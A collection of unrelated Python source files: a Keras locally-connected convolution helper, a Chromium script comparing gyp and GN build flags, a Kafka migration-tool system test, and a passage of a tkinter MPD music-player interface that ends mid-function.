if `data_format == `"channels_first"`, or
`(d_in1, ..., d_inN, 1, d_out1, ..., d_outN, 1)`
if `data_format == "channels_last"`.
Raises:
ValueError: if `data_format` is neither `"channels_first"` nor
`"channels_last"`.
"""
mask = conv_utils.conv_kernel_mask(
input_shape=input_shape,
kernel_shape=kernel_shape,
strides=strides,
padding=padding
)
ndims = int(mask.ndim / 2)
mask = K.variable(mask, dtype)
if data_format == 'channels_first':
mask = K.expand_dims(mask, 0)
mask = K.expand_dims(mask, - ndims - 1)
elif data_format == 'channels_last':
mask = K.expand_dims(mask, ndims)
mask = K.expand_dims(mask, -1)
else:
raise ValueError('Unrecognized data_format: ' + str(data_format))
return mask
def local_conv_matmul(inputs, kernel, kernel_mask, output_shape):
"""Apply N-D convolution with un-shared weights using a single matmul call.
This method outputs `inputs . (kernel * kernel_mask)`
(with `.` standing for matrix-multiply and `*` for element-wise multiply)
and requires a precomputed `kernel_mask` to zero-out weights in `kernel` and
hence perform the same operation as a convolution with un-shared
(the remaining entries in `kernel`) weights. It also does the necessary
reshapes to make `inputs` and `kernel` 2-D and `output` (N+2)-D.
Arguments:
inputs: (N+2)-D tensor with shape
`(batch_size, channels_in, d_in1, ..., d_inN)`
or
`(batch_size, d_in1, ..., d_inN, channels_in)`.
kernel: the unshared weights for N-D convolution,
an (N+2)-D tensor of shape:
`(d_in1, ..., d_inN, channels_in, d_out2, ..., d_outN, channels_out)`
or
`(channels_in, d_in1, ..., d_inN, channels_out, d_out2, ..., d_outN)`,
with the ordering of channels and spatial dimensions matching
that of the input.
Each entry is the weight between a particular input and
output location, similarly to a fully-connected weight matrix.
kernel_mask: a float 0/1 mask tensor of shape:
`(d_in1, ..., d_inN, 1, d_out2, ..., d_outN, 1)`
or
`(1, d_in1, ..., d_inN, 1, d_out2, ..., d_outN)`,
with the ordering of singleton and spatial dimensions
matching that of the input.
Mask represents the connectivity pattern of the layer and is
precomputed elsewhere based on layer parameters: stride,
padding, and the receptive field shape.
output_shape: a tuple of (N+2) elements representing the output shape:
`(batch_size, channels_out, d_out1, ..., d_outN)`
or
`(batch_size, d_out1, ..., d_outN, channels_out)`,
with the ordering of channels and spatial dimensions matching that of
the input.
Returns:
Output (N+2)-D tensor with shape `output_shape`.
"""
inputs_flat = K.reshape(inputs, (K.shape(inputs)[0], -1))
kernel = kernel_mask * kernel
kernel = make_2d(kernel, split_dim=K.ndim(kernel) // 2)
output_flat = K.math_ops.sparse_matmul(inputs_flat, kernel, b_is_sparse=True)
output = K.reshape(output_flat,
[K.shape(output_flat)[0],] + output_shape.as_list()[1:])
return output
def make_2d(tensor, split_dim):
"""Reshapes an N-dimensional tensor into a 2D tensor.
Dimensions before (excluding) and after (including) `split_dim` are grouped
together.
Arguments:
tensor: a tensor of shape `(d0, ..., d(N-1))`.
split_dim: an integer from 1 to N-1, index of the dimension to group
dimensions before (excluding) and after (including).
Returns:
Tensor of shape
`(d0 * ... * d(split_dim-1), d(split_dim) * ... * d(N-1))`.
"""
shape = K.array_ops.shape(tensor)
in_dims = shape[:split_dim]
out_dims = shape[split_dim:]
in_size = K.math_ops.reduce_prod(in_dims)
out_size = K.math_ops.reduce_prod(out_dims)
return K.array_ops.reshape(tensor, (in_size, out_size))
|
|
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Given the output of -t commands from a ninja build for a gyp and GN generated
build, report on differences between the command lines."""
import os
import shlex
import subprocess
import sys
# Must be in src/.
os.chdir(os.path.join(os.path.dirname(__file__), '..', '..', '..'))
g_total_differences = 0
def FindAndRemoveArgWithValue(command_line, argname):
"""Given a command line as a list, remove and return the value of an option
that takes a value as a separate entry.
Modifies |command_line| in place.
"""
if argname not in command_line:
return ''
location = command_line.index(argname)
value = command_line[location + 1]
command_line[location:location + 2] = []
return value
def MergeSpacedArgs(command_line, argname):
"""Combine all arguments |argname| with their values, separated by a space."""
i = 0
result = []
while i < len(command_line):
arg = command_line[i]
if arg == argname:
result.append(arg + ' ' + command_line[i + 1])
i += 1
else:
result.append(arg)
i += 1
return result
def NormalizeSymbolArguments(command_line):
"""Normalize -g arguments.
If there's no -g args, it's equivalent to -g0. -g2 is equivalent to -g.
Modifies |command_line| in place.
"""
# Strip -g0 if there's no symbols.
have_some_symbols = False
for x in command_line:
if x.startswith('-g') and x != '-g0':
have_some_symbols = True
if not have_some_symbols and '-g0' in command_line:
command_line.remove('-g0')
# Rename -g2 to -g.
if '-g2' in command_line:
command_line[index('-g2')] = '-g'
def GetFlags(lines):
"""Turn a list of command lines into a semi-structured dict."""
flags_by_output = {}
for line in lines:
# TODO(scottmg): Hacky way of getting only cc for now.
if 'clang' not in line:
continue
command_line = shlex.split(line.strip())[1:]
output_name = FindAndRemoveArgWithValue(command_line, '-o')
dep_name = FindAndRemoveArgWithValue(command_line, '-MF')
NormalizeSymbolArguments(command_line)
command_line = MergeSpacedArgs(command_line, '-Xclang')
defines = [x for x in command_line if x.startswith('-D')]
include_dirs = [x for x in command_line if x.startswith('-I')]
dash_f = [x for x in command_line if x.startswith('-f')]
warnings = [x for x in command_line if x.startswith('-W')]
cc_file = [x for x in command_line if x.endswith('.cc') or
x.endswith('.c') or
x.endswith('.cpp')]
if len(cc_file) != 1:
print 'Skipping %s' % command_line
continue
assert len(cc_file) == 1
others = [x for x in command_line if x not in defines and \
x not in include_dirs and \
x not in dash_f and \
x not in warnings and \
x not in cc_file]
# Filter for libFindBadConstructs.so having a relative path in one and
# absolute path in the other.
others_filtered = []
for x in others:
if x.startswith('-Xclang ') and x.endswith('libFindBadConstructs.so'):
others_filtered.append(
'-Xclang ' +
os.path.join(os.getcwd(),
os.path.normpath(
os.path.join('out/gn_flags', x.split(' ', 1)[1]))))
elif x.startswith('-B'):
others_filtered.append(
'-B' +
os.path.join(os.getcwd(),
os.path.normpath(os.path.join('out/gn_flags', x[2:]))))
else:
others_filtered.append(x)
others = others_filtered
flags_by_output[cc_file[0]] = {
'output': output_name,
'depname': dep_name,
'defines': sorted(defines),
'include_dirs': sorted(include_dirs), # TODO(scottmg): This is wrong.
'dash_f': sorted(dash_f),
'warnings': sorted(warnings),
'other': sorted(others),
}
return flags_by_output
def CompareLists(gyp, gn, name, dont_care_gyp=None, dont_care_gn=None):
"""Return a report of any differences between gyp and gn lists, ignoring
anything in |dont_care_{gyp|gn}| respectively."""
global g_total_differences
if not dont_care_gyp:
dont_care_gyp = []
if not dont_care_gn:
dont_care_gn = []
output = ''
if gyp[name] != gn[name]:
gyp_set = set(gyp[name])
gn_set = set(gn[name])
missing_in_gyp = gyp_set - gn_set
missing_in_gn = gn_set - gyp_set
missing_in_gyp -= set(dont_care_gyp)
missing_in_gn -= set(dont_care_gn)
if missing_in_gyp or missing_in_gn:
output += ' %s differ:\n' % name
if missing_in_gyp:
output += ' In gyp, but not in GN:\n %s' % '\n '.join(
sorted(missing_in_gyp)) + '\n'
g_total_differences += len(missing_in_gyp)
if missing_in_gn:
output += ' In GN, but not in gyp:\n %s' % '\n '.join(
sorted(missing_in_gn)) + '\n\n'
g_total_differences += len(missing_in_gn)
return output
def Run(command_line):
"""Run |command_line| as a subprocess and return stdout. Raises on error."""
return subprocess.check_output(command_line, shell=True)
def main():
if len(sys.argv) != 2 and len(sys.argv) != 3:
print 'usage: %s gyp_target gn_target' % __file__
print ' or: %s target' % __file__
return 1
if len(sys.argv) == 2:
sys.argv.append(sys.argv[1])
print >>sys.stderr, 'Regenerating...'
# Currently only Release, non-component.
Run('gn gen out/gn_flags --args="is_debug=false is_component_build=false"')
os.environ.pop('GYP_DEFINES', None)
Run('python build/gyp_chromium -Goutput_dir=out_gyp_flags -Gconfig=Release')
gn = Run('ninja -C out/gn_flags -t commands %s' % sys.argv[2])
gyp = Run('ninja -C out_gyp_flags/Release -t commands %s' % sys.argv[1])
all_gyp_flags = GetFlags(gyp.splitlines())
all_gn_flags = GetFlags(gn.splitlines())
gyp_files = set(all_gyp_flags.keys())
gn_files = set(all_gn_flags.keys())
different_source_list = gyp_files != gn_files
if different_source_list:
print 'Different set of sources files:'
print ' In gyp, not in GN:\n %s' % '\n '.join(
sorted(gyp_files - gn_files))
print ' In GN, not in gyp:\n %s' % '\n '.join(
sorted(gn_files - gyp_files))
print '\nNote that flags will only be compared for files in both sets.\n'
file_list = gyp_files & gn_files
files_with_given_differences = {}
for filename in sorted(file_list):
gyp_flags = all_gyp_flags[filename]
gn_flags = all_gn_flags[filename]
differences = CompareLists(gyp_flags, gn_flags, 'dash_f')
differences += CompareLists(gyp_flags, gn_flags, 'defines')
differences += CompareLists(gyp_flags, gn_flags, 'include_dirs')
differences += CompareLists(gyp_flags, gn_flags, 'warnings', dont_care_gn=[
# More conservative warnings in GN we consider to be OK.
'-Wendif-labels',
'-Wextra',
'-Wsign-compare',
])
differences += CompareLists(gyp_flags, gn_flags, 'other')
if differences:
files_with_given_differences.setdefault(differences, []).append(filename)
for diff, files in files_with_given_differences.iteritems():
print '\n'.join(sorted(files))
print diff
print 'Total differences:', g_total_differences
# TODO(scottmg): Return failure on difference once we're closer to identical.
return 0
if __name__ == '__main__':
sys.exit(main())
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#!/usr/bin/env python
# ===================================
# migration_tool_test.py
# ===================================
import inspect
import logging
import os
import signal
import subprocess
import sys
import time
import traceback
from system_test_env import SystemTestEnv
sys.path.append(SystemTestEnv.SYSTEM_TEST_UTIL_DIR)
from setup_utils import SetupUtils
from replication_utils import ReplicationUtils
import system_test_utils
from testcase_env import TestcaseEnv
# product specific: Kafka
import kafka_system_test_utils
import metrics
class MigrationToolTest(ReplicationUtils, SetupUtils):
testModuleAbsPathName = os.path.realpath(__file__)
testSuiteAbsPathName = os.path.abspath(os.path.dirname(testModuleAbsPathName))
def __init__(self, systemTestEnv):
# SystemTestEnv - provides cluster level environment settings
# such as entity_id, hostname, kafka_home, java_home which
# are available in a list of dictionary named
# "clusterEntityConfigDictList"
self.systemTestEnv = systemTestEnv
super(MigrationToolTest, self).__init__(self)
# dict to pass user-defined attributes to logger argument: "extra"
d = {'name_of_class': self.__class__.__name__}
def signal_handler(self, signal, frame):
self.log_message("Interrupt detected - User pressed Ctrl+c")
# perform the necessary cleanup here when user presses Ctrl+c and it may be product specific
self.log_message("stopping all entities - please wait ...")
kafka_system_test_utils.stop_all_remote_running_processes(self.systemTestEnv, self.testcaseEnv)
sys.exit(1)
def runTest(self):
# ======================================================================
# get all testcase directories under this testsuite
# ======================================================================
testCasePathNameList = system_test_utils.get_dir_paths_with_prefix(
self.testSuiteAbsPathName, SystemTestEnv.SYSTEM_TEST_CASE_PREFIX)
testCasePathNameList.sort()
replicationUtils = ReplicationUtils(self)
# =============================================================
# launch each testcase one by one: testcase_1, testcase_2, ...
# =============================================================
for testCasePathName in testCasePathNameList:
skipThisTestCase = False
try:
# ======================================================================
# A new instance of TestcaseEnv to keep track of this testcase's env vars
# and initialize some env vars as testCasePathName is available now
# ======================================================================
self.testcaseEnv = TestcaseEnv(self.systemTestEnv, self)
self.testcaseEnv.testSuiteBaseDir = self.testSuiteAbsPathName
self.testcaseEnv.initWithKnownTestCasePathName(testCasePathName)
self.testcaseEnv.testcaseArgumentsDict = self.testcaseEnv.testcaseNonEntityDataDict["testcase_args"]
# ======================================================================
# SKIP if this case is IN testcase_to_skip.json or NOT IN testcase_to_run.json
# ======================================================================
testcaseDirName = self.testcaseEnv.testcaseResultsDict["_test_case_name"]
if self.systemTestEnv.printTestDescriptionsOnly:
self.testcaseEnv.printTestCaseDescription(testcaseDirName)
continue
elif self.systemTestEnv.isTestCaseToSkip(self.__class__.__name__, testcaseDirName):
self.log_message("Skipping : " + testcaseDirName)
skipThisTestCase = True
continue
else:
self.testcaseEnv.printTestCaseDescription(testcaseDirName)
system_test_utils.setup_remote_hosts_with_testcase_level_cluster_config(self.systemTestEnv, testCasePathName)
# ============================================================================== #
# ============================================================================== #
# Product Specific Testing Code Starts Here: #
# ============================================================================== #
# ============================================================================== #
# initialize self.testcaseEnv with user-defined environment variables (product specific)
self.testcaseEnv.userDefinedEnvVarDict["zkConnectStr"] = ""
self.testcaseEnv.userDefinedEnvVarDict["stopBackgroundProducer"] = False
self.testcaseEnv.userDefinedEnvVarDict["backgroundProducerStopped"] = False
# initialize signal handler
signal.signal(signal.SIGINT, self.signal_handler)
# TestcaseEnv.testcaseConfigsList initialized by reading testcase properties file:
# system_test/<suite_name>_testsuite/testcase_<n>/testcase_<n>_properties.json
self.testcaseEnv.testcaseConfigsList = system_test_utils.get_json_list_data(
self.testcaseEnv.testcasePropJsonPathName)
# clean up data directories specified in zookeeper.properties and kafka_server_<n>.properties
kafka_system_test_utils.cleanup_data_at_remote_hosts(self.systemTestEnv, self.testcaseEnv)
# create "LOCAL" log directories for metrics, dashboards for each entity under this testcase
# for collecting logs from remote machines
kafka_system_test_utils.generate_testcase_log_dirs(self.systemTestEnv, self.testcaseEnv)
# TestcaseEnv - initialize producer & consumer config / log file pathnames
kafka_system_test_utils.init_entity_props(self.systemTestEnv, self.testcaseEnv)
# generate remote hosts log/config dirs if not exist
kafka_system_test_utils.generate_testcase_log_dirs_in_remote_hosts(self.systemTestEnv, self.testcaseEnv)
# generate properties files for zookeeper, kafka, producer, consumer and mirror-maker:
# 1. copy system_test/<suite_name>_testsuite/config/*.properties to
# system_test/<suite_name>_testsuite/testcase_<n>/config/
# 2. update all properties files in system_test/<suite_name>_testsuite/testcase_<n>/config
# by overriding the settings specified in:
# system_test/<suite_name>_testsuite/testcase_<n>/testcase_<n>_properties.json
kafka_system_test_utils.generate_overriden_props_files(self.testSuiteAbsPathName,
self.testcaseEnv, self.systemTestEnv)
# =============================================
# preparing all entities to start the test
# =============================================
self.log_message("starting zookeepers")
kafka_system_test_utils.start_zookeepers(self.systemTestEnv, self.testcaseEnv)
self.anonLogger.info("sleeping for 2s")
time.sleep(2)
self.log_message("starting brokers")
kafka_system_test_utils.start_brokers(self.systemTestEnv, self.testcaseEnv)
self.anonLogger.info("sleeping for 5s")
time.sleep(5)
self.log_message("starting migration tool")
kafka_system_test_utils.start_migration_tool(self.systemTestEnv, self.testcaseEnv)
self.anonLogger.info("sleeping for 5s")
time.sleep(5)
# =============================================
# starting producer
# =============================================
self.log_message("starting producer in the background")
kafka_system_test_utils.start_producer_performance(self.systemTestEnv, self.testcaseEnv, True)
msgProducingFreeTimeSec = self.testcaseEnv.testcaseArgumentsDict["message_producing_free_time_sec"]
self.anonLogger.info("sleeping for " + msgProducingFreeTimeSec + " sec to produce some messages")
time.sleep(int(msgProducingFreeTimeSec))
# =============================================
# A while-loop to bounce leader as specified
# by "num_iterations" in testcase_n_properties.json
# =============================================
i = 1
numIterations = int(self.testcaseEnv.testcaseArgumentsDict["num_iteration"])
bouncedEntityDownTimeSec = 1
try:
bouncedEntityDownTimeSec = int(self.testcaseEnv.testcaseArgumentsDict["bounced_entity_downtime_sec"])
except:
pass
while i <= numIterations:
self.log_message("Iteration " + str(i) + " of " + str(numIterations))
# =============================================
# Bounce Migration Tool
# =============================================
bounceMigrationTool = self.testcaseEnv.testcaseArgumentsDict["bounce_migration_tool"]
self.log_message("bounce_migration_tool flag : " + bounceMigrationTool)
if (bounceMigrationTool.lower() == "true"):
clusterConfigList = self.systemTestEnv.clusterEntityConfigDictList
migrationToolEntityIdList = system_test_utils.get_data_from_list_of_dicts(
clusterConfigList, "role", "migration_tool", "entity_id")
stoppedMigrationToolEntityId = migrationToolEntityIdList[0]
migrationToolPPid = self.testcaseEnv.entityMigrationToolParentPidDict[stoppedMigrationToolEntityId]
self.log_message("stopping migration tool : " + migrationToolPPid)
kafka_system_test_utils.stop_remote_entity(self.systemTestEnv, stoppedMigrationToolEntityId, migrationToolPPid)
self.anonLogger.info("sleeping for " + str(bouncedEntityDownTimeSec) + " sec")
time.sleep(bouncedEntityDownTimeSec)
# starting previously terminated broker
self.log_message("starting the previously terminated migration tool")
kafka_system_test_utils.start_migration_tool(self.systemTestEnv, self.testcaseEnv, stoppedMigrationToolEntityId)
self.anonLogger.info("sleeping for 15s")
time.sleep(15)
i += 1
# while loop
# =============================================
# tell producer to stop
# =============================================
self.testcaseEnv.lock.acquire()
self.testcaseEnv.userDefinedEnvVarDict["stopBackgroundProducer"] = True
time.sleep(1)
self.testcaseEnv.lock.release()
time.sleep(1)
# =============================================
# wait for producer thread's update of
# "backgroundProducerStopped" to be "True"
# =============================================
while 1:
self.testcaseEnv.lock.acquire()
self.logger.info("status of backgroundProducerStopped : [" + \
str(self.testcaseEnv.userDefinedEnvVarDict["backgroundProducerStopped"]) + "]", extra=self.d)
if self.testcaseEnv.userDefinedEnvVarDict["backgroundProducerStopped"]:
time.sleep(1)
self.testcaseEnv.lock.release()
self.logger.info("all producer threads completed", extra=self.d)
break
time.sleep(1)
self.testcaseEnv.lock.release()
time.sleep(2)
#print "\n\n#### sleeping for 30 min ...\n\n"
#time.sleep(1800)
# =============================================
# starting consumer
# =============================================
self.log_message("starting consumer in the background")
kafka_system_test_utils.start_console_consumer(self.systemTestEnv, self.testcaseEnv)
self.anonLogger.info("sleeping for 20s")
time.sleep(20)
# =============================================
# this testcase is completed - stop all entities
# =============================================
self.log_message("stopping all entities")
for entityId, parentPid in self.testcaseEnv.entityBrokerParentPidDict.items():
kafka_system_test_utils.stop_remote_entity(self.systemTestEnv, entityId, parentPid)
for entityId, parentPid in self.testcaseEnv.entityZkParentPidDict.items():
kafka_system_test_utils.stop_remote_entity(self.systemTestEnv, entityId, parentPid)
# make sure all entities are stopped
kafka_system_test_utils.ps_grep_terminate_running_entity(self.systemTestEnv)
# =============================================
# collect logs from remote hosts
# =============================================
kafka_system_test_utils.collect_logs_from_remote_hosts(self.systemTestEnv, self.testcaseEnv)
# =============================================
# validate the data matched and checksum
# =============================================
self.log_message("validating data matched")
kafka_system_test_utils.validate_data_matched(self.systemTestEnv, self.testcaseEnv, replicationUtils)
kafka_system_test_utils.validate_broker_log_segment_checksum(self.systemTestEnv, self.testcaseEnv)
# =============================================
# draw graphs
# =============================================
metrics.draw_all_graphs(self.systemTestEnv.METRICS_PATHNAME,
self.testcaseEnv,
self.systemTestEnv.clusterEntityConfigDictList)
# build dashboard, one for each role
metrics.build_all_dashboards(self.systemTestEnv.METRICS_PATHNAME,
self.testcaseEnv.testCaseDashboardsDir,
self.systemTestEnv.clusterEntityConfigDictList)
except Exception as e:
self.log_message("Exception while running test {0}".format(e))
traceback.print_exc()
finally:
if not skipThisTestCase and not self.systemTestEnv.printTestDescriptionsOnly:
self.log_message("stopping all entities - please wait ...")
kafka_system_test_utils.stop_all_remote_running_processes(self.systemTestEnv, self.testcaseEnv)
|
|
#!/usr/bin/env python3
import tkinter, mpd, configparser, subprocess, sys
from tkinter import Listbox, Label, Canvas, Frame, Y, X
from PIL import Image, ImageTk, ImageColor
from subprocess import call
from pathlib import Path
root = tkinter.Tk()
root.geometry("320x240")
client = mpd.MPDClient(use_unicode=True)
config = configparser.ConfigParser()
config.read('config.ini')
theme_name = config["THEME"]["theme"]
theme = configparser.ConfigParser()
theme.read('./theme/' + theme_name + '/theme.ini')
icon_random = None
icon_repeat = None
icon_single = None
status = {}
queue = []
playlists = []
artists = []
albums = []
genres = []
songs = []
themes = []
selectedAlbum = ''
selectedArtist = ''
selectedGenre = ''
currentSong = None
keyMode = 'MENU'
textEntry = ''
textBackAction = ''
textSaveAction = ''
image = None
bg = None
awayCount = 0
footerMessage = ''
footerMessageCount = 0
minTickerLength = 30
songName = ''
songChanged = False
songTicker = False
songTickerCount = 0
volumeChanged = False
class PiScreen(tkinter.Frame):
def __init__(self, master: 'tkinter.Tk'):
global client, status, theme
# host = '192.168.1.120'
host = 'localhost'
if sys.platform.startswith('linux'):
host = 'localhost'
client.connect(host, 6600)
tkinter.Frame.__init__(self, master, padx=0, pady=0)
self.pack()
self.place(height=240, width=320, x=0, y=0)
status = client.status()
self.volume = int(status["volume"])
self.screen_data = {
"1": ["QUEUE", "PLAYLISTS", "LIBRARY", "SETUP", "CLEAR PLAYLIST", "RANDOM " + status['random'],
"REPEAT " + status['repeat'], "SINGLE " + status['single'], "CONSUME " + status['consume']],
"1.1": {"ACTION": "QUEUE"},
"1.2": {"ACTION": "PLAYLISTS"},
"1.3": ["ARTISTS", "ALBUMS", "GENRES"],
"1.3.1": {"ACTION": "ARTISTS"},
"1.3.2": {"ACTION": "ALBUMS"},
"1.3.3": {"ACTION": "GENRES"},
"1.4": ["UPDATE LIBRARY", "THEMES"],
"1.4.1": {"ACTION": "UPDATE_LIBRARY"},
"1.4.2": {"ACTION": "THEMES"},
"1.5": {"ACTION": "CLEAR"},
"1.6": {"ACTION": "RANDOM"},
"1.7": {"ACTION": "REPEAT"},
"1.8": {"ACTION": "SINGLE"},
"1.9": {"ACTION": "CONSUME"}
}
self.screen_format = {
"1.Q": "SONG",
"1.P": "PLAYLIST"
}
self.current_song_var = tkinter.StringVar()
self.footer_text_var = tkinter.StringVar()
# Screens
self.playerScreen = Canvas(self, width=320, height=240, bg=theme['PLAYER']['background'], borderwidth=0,
highlightthickness=0)
self.menuScreen = Frame(self, width=320, height=240, bg="white")
self.menuScreen.place(height=240, width=320, x=0, y=0)
# Menu Screen items
self.headerFrame = Frame(self.menuScreen, width=320, height=20, bg=theme['HEADER']['background'])
self.headerFrame.pack(side=tkinter.TOP, fill=X)
self.currentSongLabel = Label(self.headerFrame, font=(theme['HEADER']['font'], 12, 'bold'),
bg=theme['HEADER']['background'], foreground=theme['HEADER']['foreground'],
textvariable=self.current_song_var, justify=tkinter.LEFT, anchor=tkinter.W)
self.currentSongLabel.place(x=0, y=0, width=300, height=20, anchor=tkinter.NW)
self.volumeLabel = Label(self.headerFrame, font=(theme['HEADER']['font'], 10, 'bold'),
bg=theme['HEADER']['background'], foreground=theme['HEADER']['foreground'], text='')
self.volumeLabel.place(x=300, y=0, anchor=tkinter.NW)
self.mainFrame = Frame(self.menuScreen, width=320, height=200)
self.mainFrame.pack(side=tkinter.TOP, fill=Y)
self.listbox = Listbox(self.mainFrame, selectmode=tkinter.SINGLE, font=(theme['MAIN']['font'], 11),
bg=theme['MAIN']['background'],
fg=theme['MAIN']['foreground'], height=10, activestyle="none", borderwidth=0,
highlightthickness=0, selectbackground=theme['MAIN']['selected'],
selectforeground=theme['MAIN']['foreground'])
self.listbox.bind("<Key>", self.handle_keys)
self.listbox.configure(width=320, height=11)
self.listbox.pack(side=tkinter.TOP, expand=1, ipadx=0, ipady=0, padx=0, pady=0)
self.listbox.focus_set()
self.footer = Label(self.menuScreen, textvariable=self.footer_text_var,
font=(theme['FOOTER']['font'], 10, 'bold'), bg=theme['FOOTER']['background'],
foreground=theme['FOOTER']['foreground'], justify=tkinter.LEFT, anchor=tkinter.W)
self.footer.configure(width=320, height=1)
self.footer.pack(side=tkinter.BOTTOM)
self.focus_set()
self.bind("<Key>", self.handle_keys)
self.screen = "1"
self.show_screen()
self.tick()
def tick(self):
global awayCount, keyMode, footerMessage, footerMessageCount
self.update_header()
if keyMode != 'PLAYER':
awayCount += 1
if awayCount > 120:
awayCount = 0
self.screen = ''
self.show_screen()
else:
awayCount = 0
if footerMessage == self.footer_text_var.get():
footerMessageCount += 1
if footerMessageCount > 8:
footerMessageCount = 0
self.footer_text_var.set("")
else:
footerMessage = self.footer_text_var.get()
footerMessageCount = 0
self.after(800, self.tick)
def update_header(self):
global status, keyMode, songChanged, currentSong, songName, songTicker, minTickerLength, songTickerCount
status = client.status()
self.volume = int(status["volume"])
self.volumeLabel.configure(text=status["volume"])
if status["state"] == "play":
currentSong = client.currentsong()
song = currentSong["artist"] + " - " + currentSong["title"]
if songName != song:
songChanged = True
songName = song
if keyMode != 'PLAYER': # song changed, refresh ui
if len(songName) >= minTickerLength:
songTicker = True
songTickerCount = -1
else:
songTicker = False
songTickerCount = 0
if keyMode != 'PLAYER':
if songTicker:
songTickerCount += 1
if songTickerCount == len(songName) + 5:
songTickerCount = 0
song = songName + " "
new_song = song[songTickerCount:] + song[:songTickerCount]
self.current_song_var.set(new_song)
elif keyMode == 'PLAYER':
self.show_player()
else:
if songName != '':
self.current_song_var.set('')
songName = ''
songChanged = True
if keyMode == 'PLAYER':
self.show_player()
def show_screen(self):
global keyMode
if self.screen == '':
keyMode = 'PLAYER'
self.menuScreen.place_forget()
self.playerScreen.place(height=240, width=320, x=0, y=0)
self.show_player()
self.update()
self.screen = '1'
return
self.listbox.delete(0, self.listbox.size() - 1)
format_name = "string"
if self.screen in self.screen_format:
format_name = self.screen_format[self.screen]
if isinstance(self.screen_data[self.screen], list):
for item in self.screen_data[self.screen]:
if format_name == "string":
if not item:
self.listbox.insert(tkinter.END, "")
else:
self.listbox.insert(tkinter.END, item[:36])
if format_name == "SONG":
songname = ''
if 'artist' in item:
songname = item['artist'][:18]
songname += " - "
if 'title' in item:
max = 36 - len(songname)
songname += item['title'][:max]
self.listbox.insert(tkinter.END, songname)
if format_name == "PLAYLIST":
playlist_name = ''
if isinstance(item, str):
playlist_name = item
else:
playlist_name = item['playlist']
self.listbox.insert(tkinter.END, playlist_name)
self.listbox.select_set(0) # This only sets focus on the first item.
self.listbox.event_generate("<<ListboxSelect>>")
self.update()
return
def show_player(self):
global image, bg, songChanged, volumeChanged
if songChanged or image is None:
if sys.platform.startswith('linux'):
process = subprocess.Popen("./coverart.sh", shell=True, stdout=subprocess.PIPE).stdout.read()
else:
process = "./icons/ic_album_white_48dp.png"
image = ImageTk.PhotoImage(Image.open(process).resize((136, 136), Image.ANTIALIAS))
if bg is None:
process = "./icons/bg.png"
if 'img_background' in theme['PLAYER']:
process = theme['PLAYER']['img_background']
bg = ImageTk.PhotoImage(Image.open(process).resize((320, 240), Image.ANTIALIAS))
if icon_random is None:
self.load_icons()
if status["state"] == "play":
if songChanged:
self.playerScreen.delete(tkinter.ALL)
self.playerScreen.create_image(160, 120, image=bg)
self.playerScreen.create_rectangle(10, 10, 150, 150, fill=theme['PLAYER']['foreground'])
self.playerScreen.create_image(80, 80, image=image)
self.playerScreen.create_image(178, 132, image=icon_random)
self.playerScreen.create_image(224, 132, image=icon_repeat)
self.playerScreen.create_image(270, 132, image=icon_single)
self.playerScreen.create_rectangle(298, 146, 308, 92, fill=theme['PLAYER']['background'],
outline=theme['PLAYER']['foreground'], width=1)
self.playerScreen.create_line(303, 144, 303, 144 - int(self.volume / 2),
fill=theme['PLAYER']['foreground'], width=7)
self.playerScreen.create_text(10, 160, text=currentSong['artist'], anchor=tkinter.NW,
fill=theme['PLAYER']['foreground'],
font=(theme['PLAYER']['font'], 14, 'bold'))
self.playerScreen.create_text(10, 185, text=currentSong['title'], anchor=tkinter.NW,
fill=theme['PLAYER']['foreground'],
font=(theme['PLAYER']['font'], 12, 'bold'))
self.playerScreen.create_text(10, 210, text=currentSong['album'], anchor=tkinter.NW,
fill=theme['PLAYER']['foreground'],
font=(theme['PLAYER']['font'], 10, 'bold'))
else:
time = str(status['time']).split(":")
played = int((float(time[0]) / float(time[1])) * 320)
if played < 3: # bug
self.playerScreen.create_rectangle(0, 236, 320, 240, fill=theme['PLAYER']['background'])
self.playerScreen.create_rectangle(0, 236, played, 240, fill=theme['PLAYER']['foreground'])
if volumeChanged:
volumeChanged = False
self.playerScreen.create_rectangle(298, 146, 308, 92, fill=theme['PLAYER']['background'],
outline=theme['PLAYER']['foreground'], width=1)
self.playerScreen.create_line(303, 144, 303, 144 - int(self.volume / 2),
fill=theme['PLAYER']['foreground'],
width=7)
else: # Blank Screen
self.playerScreen.delete(tkinter.ALL)
self.playerScreen.create_image(160, 120, image=bg)
self.playerScreen.create_text(20, 20, text=theme['PLAYER']['default_message'], anchor=tkinter.NW,
fill=theme['PLAYER']['foreground'],
font=(theme['PLAYER']['font'], 20, 'bold'))
songChanged = False
return
def handle_keys(self, event):
global config, client, selectedAlbum, selectedArtist, selectedGenre
global keyMode, textEntry, textBackAction, textSaveAction, awayCount, theme_name
global albums, artists, queue, songs, playlists, status, genres, songChanged, volumeChanged
awayCount = 0
keycode = str(event.keycode)
# self.footer_text_var.set(str("Key Pressed : "+keycode))
if keyMode == 'PLAYER' and keycode != config["PISCREEN_KEYS"]["vol_up"] \
and keycode != config["PISCREEN_KEYS"]["vol_down"] \
and keycode != config["PISCREEN_KEYS"]["play"] \
and keycode != config["PISCREEN_KEYS"]["next"] \
and keycode != config["PISCREEN_KEYS"]["prev"] \
and keycode != config["PISCREEN_KEYS"]["power"] \
and keycode != config["PISCREEN_KEYS"]["left"]:
keyMode = 'MENU'
self.playerScreen.place_forget()
self.menuScreen.place(height=240, width=320, x=0, y=0)
self.show_screen()
self.update()
return
if keyMode == 'TEXT':
if keycode == config["PISCREEN_KEYS"]["back"]: # back
keyMode = 'MENU'
self.run_command(textBackAction)
if keycode == config["PISCREEN_KEYS"]["ok"]: # ok
keyMode = 'MENU'
self.run_command(textSaveAction)
if event.keysym in '0123456789-abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ':
textEntry += event.keysym
self.footer_text_var.set(str("Entry : " + textEntry))
return
# self.footer.configure(text=str('Key Pressed ' + str(event.keycode)))
if keycode == config["PISCREEN_KEYS"]["menu"]:
